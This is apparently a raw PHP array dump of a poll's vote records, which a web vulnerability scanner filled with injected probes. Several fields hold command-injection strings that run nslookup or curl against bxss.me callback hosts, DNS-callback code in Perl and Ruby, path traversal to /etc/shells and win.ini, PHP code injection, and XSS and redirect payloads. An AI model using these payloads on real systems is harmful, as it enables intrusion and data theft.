'sondage_id' => '2'
),
(int) 2154 => array(
'id' => '2697',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2155 => array(
'id' => '2698',
'ip' => '194.34.233.95',
'ip1' => ''.gethostbyname(lc('hitms'.'jqpzctfwfd518.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(105).chr(87).chr(104).chr(65).'',
'sondage_id' => '2'
),
(int) 2156 => array(
'id' => '2699',
'ip' => 'https://bxss.me/\',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2157 => array(
'id' => '2700',
'ip' => '194.34.233.95',
'ip1' => '<pre class="||sleep(27*1000)*nmczdb||"',
'sondage_id' => '2'
),
(int) 2158 => array(
'id' => '2701',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2159 => array(
'id' => '2702',
'ip' => '194.34.233.95',
'ip1' => '".gethostbyname(lc("hitte"."yubhllwk0f78c.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(84).chr(98).chr(79)."',
'sondage_id' => '2'
),
(int) 2160 => array(
'id' => '2703',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2161 => array(
'id' => '2704',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2162 => array(
'id' => '2705',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2163 => array(
'id' => '2706',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2164 => array(
'id' => '2707',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2165 => array(
'id' => '2708',
'ip' => '194.34.233.95',
'ip1' => 'gethostbyname(lc('hitjb'.'xnxrwwoccc69c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(84).chr(105).chr(70)',
'sondage_id' => '2'
),
(int) 2166 => array(
'id' => '2709',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2167 => array(
'id' => '2710',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2168 => array(
'id' => '2711',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2169 => array(
'id' => '2712',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2170 => array(
'id' => '2713',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2171 => array(
'id' => '2714',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2172 => array(
'id' => '2715',
'ip' => 'c:/windows/win.ini',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2173 => array(
'id' => '2716',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2174 => array(
'id' => '2717',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2175 => array(
'id' => '2718',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2176 => array(
'id' => '2719',
'ip' => 'bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2177 => array(
'id' => '2720',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2178 => array(
'id' => '2721',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2179 => array(
'id' => '2722',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2180 => array(
'id' => '2723',
'ip' => '194.34.233.95',
'ip1' => 'http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg',
'sondage_id' => '2'
),
(int) 2181 => array(
'id' => '2724',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2182 => array(
'id' => '2725',
'ip' => '194.34.233.95',
'ip1' => 'HttP://bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 2183 => array(
'id' => '2726',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2184 => array(
'id' => '2727',
'ip' => '194.34.233.95',
'ip1' => '1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg',
'sondage_id' => '2'
),
(int) 2185 => array(
'id' => '2728',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2186 => array(
'id' => '2729',
'ip' => '194.34.233.95',
'ip1' => 'bxss.me/t/xss.html?%00',
'sondage_id' => '2'
),
(int) 2187 => array(
'id' => '2730',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2188 => array(
'id' => '2731',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2189 => array(
'id' => '2732',
'ip' => '194.34.233.95',
'ip1' => 'Http://bxss.me/t/fit.txt',
'sondage_id' => '2'
),
(int) 2190 => array(
'id' => '2733',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2191 => array(
'id' => '2734',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2192 => array(
'id' => '2735',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2193 => array(
'id' => '2736',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2194 => array(
'id' => '2737',
'ip' => '194.34.233.95',
'ip1' => 'http://bxss.me/t/fit.txt%3F.jpg',
'sondage_id' => '2'
),
(int) 2195 => array(
'id' => '2738',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2196 => array(
'id' => '2739',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2197 => array(
'id' => '2740',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2198 => array(
'id' => '2741',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2199 => array(
'id' => '2742',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2200 => array(
'id' => '2743',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2201 => array(
'id' => '2744',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2202 => array(
'id' => '2745',
'ip' => '194.34.233.95',
'ip1' => '/etc/shells',
'sondage_id' => '2'
),
(int) 2203 => array(
'id' => '2746',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2204 => array(
'id' => '2747',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2205 => array(
'id' => '2748',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2206 => array(
'id' => '2749',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2207 => array(
'id' => '2750',
'ip' => '194.34.233.95',
'ip1' => '"+"A".concat(70-3).concat(22*4).concat(122).concat(76).concat(114).concat(72)+(require"socket"
Socket.gethostbyname("hitbi"+"cpvxinyce73be.bxss.me.")[3].to_s)+"',
'sondage_id' => '2'
),
(int) 2208 => array(
'id' => '2751',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2209 => array(
'id' => '2752',
'ip' => '194.34.233.95',
'ip1' => '../../../../../../../../../../../../../../etc/shells',
'sondage_id' => '2'
),
(int) 2210 => array(
'id' => '2753',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2211 => array(
'id' => '2754',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2212 => array(
'id' => '2755',
'ip' => '194.34.233.95',
'ip1' => ''+'A'.concat(70-3).concat(22*4).concat(116).concat(80).concat(100).concat(85)+(require'socket'
Socket.gethostbyname('hitoi'+'qnrpnnxrf92bb.bxss.me.')[3].to_s)+'',
'sondage_id' => '2'
),
(int) 2213 => array(
'id' => '2756',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2214 => array(
'id' => '2757',
'ip' => '194.34.233.95',
'ip1' => 'c:/windows/win.ini',
'sondage_id' => '2'
),
(int) 2215 => array(
'id' => '2758',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2216 => array(
'id' => '2759',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2217 => array(
'id' => '2760',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2218 => array(
'id' => '2761',
'ip' => '194.34.233.95',
'ip1' => ''A'.concat(70-3).concat(22*4).concat(99).concat(84).concat(122).concat(68)+(require'socket'
Socket.gethostbyname('hitgv'+'xnbsjmnc1a8eb.bxss.me.')[3].to_s)',
'sondage_id' => '2'
),
(int) 2219 => array(
'id' => '2762',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2220 => array(
'id' => '2763',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2221 => array(
'id' => '2764',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2222 => array(
'id' => '2765',
'ip' => '194.34.233.95',
'ip1' => 'bxss.me',
'sondage_id' => '2'
),
(int) 2223 => array(
'id' => '2766',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2224 => array(
'id' => '2767',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2225 => array(
'id' => '2768',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2226 => array(
'id' => '2769',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2227 => array(
'id' => '2770',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2228 => array(
'id' => '2771',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2229 => array(
'id' => '2772',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2230 => array(
'id' => '2773',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2231 => array(
'id' => '2774',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2232 => array(
'id' => '2775',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2233 => array(
'id' => '2776',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2234 => array(
'id' => '2777',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2235 => array(
'id' => '2778',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2236 => array(
'id' => '2779',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2237 => array(
'id' => '2780',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2238 => array(
'id' => '2781',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2239 => array(
'id' => '2782',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2240 => array(
'id' => '2783',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2241 => array(
'id' => '2784',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2242 => array(
'id' => '2785',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2243 => array(
'id' => '2786',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2244 => array(
'id' => '2787',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2245 => array(
'id' => '2788',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2246 => array(
'id' => '2789',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2247 => array(
'id' => '2790',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2248 => array(
'id' => '2791',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2249 => array(
'id' => '2792',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2250 => array(
'id' => '2793',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2251 => array(
'id' => '2794',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2252 => array(
'id' => '2795',
'ip' => '194.34.233.95',
'ip1' => ')))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))',
'sondage_id' => '2'
),
(int) 2253 => array(
'id' => '2796',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2254 => array(
'id' => '2797',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2255 => array(
'id' => '2798',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2256 => array(
'id' => '2799',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2257 => array(
'id' => '2800',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2258 => array(
'id' => '2801',
'ip' => 'xfs.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2259 => array(
'id' => '2802',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2260 => array(
'id' => '2803',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2261 => array(
'id' => '2804',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2262 => array(
'id' => '2805',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2263 => array(
'id' => '2806',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2264 => array(
'id' => '2807',
'ip' => '194.34.233.95',
'ip1' => 'xfs.bxss.me',
'sondage_id' => '2'
),
(int) 2265 => array(
'id' => '2808',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2266 => array(
'id' => '2809',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2267 => array(
'id' => '2810',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2268 => array(
'id' => '2811',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2269 => array(
'id' => '2812',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2270 => array(
'id' => '2813',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2271 => array(
'id' => '2814',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2272 => array(
'id' => '2815',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2273 => array(
'id' => '2816',
'ip' => '194.34.233.95',
'ip1' => 'echo gibvsr$()\ fqjbtn\nz^xyu||a #' &echo gibvsr$()\ fqjbtn\nz^xyu||a #|" &echo gibvsr$()\ fqjbtn\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 2274 => array(
'id' => '2817',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2275 => array(
'id' => '2818',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2276 => array(
'id' => '2819',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2277 => array(
'id' => '2820',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2278 => array(
'id' => '2821',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2279 => array(
'id' => '2822',
'ip' => '194.34.233.95',
'ip1' => '&echo hrsbhf$()\ gxkbwy\nz^xyu||a #' &echo hrsbhf$()\ gxkbwy\nz^xyu||a #|" &echo hrsbhf$()\ gxkbwy\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 2280 => array(
'id' => '2823',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2281 => array(
'id' => '2824',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2282 => array(
'id' => '2825',
'ip' => '194.34.233.95',
'ip1' => '<pre class=&echo yefphb$()\ knquij\nz^xyu||a #' &echo yefphb$()\ knquij\nz^xyu||a #|" &echo yefphb$()\ knquij\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 2283 => array(
'id' => '2826',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2284 => array(
'id' => '2827',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2285 => array(
'id' => '2828',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2286 => array(
'id' => '2829',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2287 => array(
'id' => '2830',
'ip' => 'bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2288 => array(
'id' => '2831',
'ip' => '194.34.233.95',
'ip1' => '|echo wphadg$()\ mzbgqy\nz^xyu||a #' |echo wphadg$()\ mzbgqy\nz^xyu||a #|" |echo wphadg$()\ mzbgqy\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 2289 => array(
'id' => '2832',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2290 => array(
'id' => '2833',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2291 => array(
'id' => '2834',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2292 => array(
'id' => '2835',
'ip' => '194.34.233.95',
'ip1' => '<pre class=|echo maqzvn$()\ utazqu\nz^xyu||a #' |echo maqzvn$()\ utazqu\nz^xyu||a #|" |echo maqzvn$()\ utazqu\nz^xyu||a #',
'sondage_id' => '2'
),
(int) 2293 => array(
'id' => '2836',
'ip' => 'scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2294 => array(
'id' => '2837',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2295 => array(
'id' => '2838',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2296 => array(
'id' => '2839',
'ip' => '194.34.233.95',
'ip1' => '(nslookup -q=cname hitjoupsvsdpp2b62b.bxss.me||curl hitjoupsvsdpp2b62b.bxss.me))',
'sondage_id' => '2'
),
(int) 2297 => array(
'id' => '2840',
'ip' => 'scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2298 => array(
'id' => '2841',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2299 => array(
'id' => '2842',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2300 => array(
'id' => '2843',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2301 => array(
'id' => '2844',
'ip' => '194.34.233.95',
'ip1' => '$(nslookup -q=cname hitrxsgnzqgjz0845a.bxss.me||curl hitrxsgnzqgjz0845a.bxss.me)',
'sondage_id' => '2'
),
(int) 2302 => array(
'id' => '2845',
'ip' => 'scimat.dz:80@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2303 => array(
'id' => '2846',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2304 => array(
'id' => '2847',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2305 => array(
'id' => '2848',
'ip' => '194.34.233.95',
'ip1' => '&nslookup -q=cname hithpvvqujhwrfaf62.bxss.me&'\"`0&nslookup -q=cname hithpvvqujhwrfaf62.bxss.me&`'',
'sondage_id' => '2'
),
(int) 2306 => array(
'id' => '2849',
'ip' => 'bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2307 => array(
'id' => '2850',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2308 => array(
'id' => '2851',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2309 => array(
'id' => '2852',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2310 => array(
'id' => '2853',
'ip' => '194.34.233.95',
'ip1' => '&(nslookup -q=cname hitekndosdbhhed101.bxss.me||curl hitekndosdbhhed101.bxss.me)&'\"`0&(nslookup -q=cname hitekndosdbhhed101.bxss.me||curl hitekndosdbhhed101.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 2311 => array(
'id' => '2854',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2312 => array(
'id' => '2855',
'ip' => 'bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2313 => array(
'id' => '2856',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2314 => array(
'id' => '2857',
'ip' => '194.34.233.95',
'ip1' => '|(nslookup -q=cname hitjtphjlllel2d573.bxss.me||curl hitjtphjlllel2d573.bxss.me)',
'sondage_id' => '2'
),
(int) 2315 => array(
'id' => '2858',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2316 => array(
'id' => '2859',
'ip' => 'bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2317 => array(
'id' => '2860',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2318 => array(
'id' => '2861',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2319 => array(
'id' => '2862',
'ip' => '194.34.233.95',
'ip1' => '`(nslookup -q=cname hitczbckafwki04a5f.bxss.me||curl hitczbckafwki04a5f.bxss.me)`',
'sondage_id' => '2'
),
(int) 2320 => array(
'id' => '2863',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2321 => array(
'id' => '2864',
'ip' => ''"',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2322 => array(
'id' => '2865',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2323 => array(
'id' => '2866',
'ip' => '194.34.233.95',
'ip1' => ';(nslookup -q=cname hithqwefwxqxpc4328.bxss.me||curl hithqwefwxqxpc4328.bxss.me)|(nslookup -q=cname hithqwefwxqxpc4328.bxss.me||curl hithqwefwxqxpc4328.bxss.me)&(nslookup -q=cname hithqwefwxqxpc4328.bxss.me||curl hithqwefwxqxpc4328.bxss.me)',
'sondage_id' => '2'
),
(int) 2324 => array(
'id' => '2867',
'ip' => '//bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2325 => array(
'id' => '2868',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2326 => array(
'id' => '2869',
'ip' => '<!--',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2327 => array(
'id' => '2870',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2328 => array(
'id' => '2871',
'ip' => '194.34.233.95',
'ip1' => '|(nslookup${IFS}-q${IFS}cname${IFS}hitticmmkztylf67f6.bxss.me||curl${IFS}hitticmmkztylf67f6.bxss.me)',
'sondage_id' => '2'
),
(int) 2329 => array(
'id' => '2872',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2330 => array(
'id' => '2873',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2331 => array(
'id' => '2874',
'ip' => '//scimat.dz.bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2332 => array(
'id' => '2875',
'ip' => '194.34.233.95',
'ip1' => ''"',
'sondage_id' => '2'
),
(int) 2333 => array(
'id' => '2876',
'ip' => '194.34.233.95',
'ip1' => '&(nslookup${IFS}-q${IFS}cname${IFS}hitktlneravxd59a16.bxss.me||curl${IFS}hitktlneravxd59a16.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitktlneravxd59a16.bxss.me||curl${IFS}hitktlneravxd59a16.bxss.me)&`'',
'sondage_id' => '2'
),
(int) 2334 => array(
'id' => '2877',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2335 => array(
'id' => '2878',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2336 => array(
'id' => '2879',
'ip' => '//scimat.dz@bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2337 => array(
'id' => '2880',
'ip' => '194.34.233.95',
'ip1' => '<!--',
'sondage_id' => '2'
),
(int) 2338 => array(
'id' => '2881',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2339 => array(
'id' => '2882',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2340 => array(
'id' => '2883',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2341 => array(
'id' => '2884',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2342 => array(
'id' => '2885',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2343 => array(
'id' => '2886',
'ip' => '194.34.233.95',
'ip1' => ';assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));',
'sondage_id' => '2'
),
(int) 2344 => array(
'id' => '2887',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2345 => array(
'id' => '2888',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2346 => array(
'id' => '2889',
'ip' => '//bxss.me\@scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2347 => array(
'id' => '2890',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2348 => array(
'id' => '2891',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2349 => array(
'id' => '2892',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2350 => array(
'id' => '2893',
'ip' => '194.34.233.95',
'ip1' => '';print(md5(31337));$a='',
'sondage_id' => '2'
),
(int) 2351 => array(
'id' => '2894',
'ip' => '//bxss.me#scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2352 => array(
'id' => '2895',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2353 => array(
'id' => '2896',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2354 => array(
'id' => '2897',
'ip' => '194.34.233.95',
'ip1' => '";print(md5(31337));$a="',
'sondage_id' => '2'
),
(int) 2355 => array(
'id' => '2898',
'ip' => '//bxss.me?scimat.dz',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2356 => array(
'id' => '2899',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2357 => array(
'id' => '2900',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2358 => array(
'id' => '2901',
'ip' => '194.34.233.95',
'ip1' => '${@print(md5(31337))}',
'sondage_id' => '2'
),
(int) 2359 => array(
'id' => '2902',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2360 => array(
'id' => '2903',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2361 => array(
'id' => '2904',
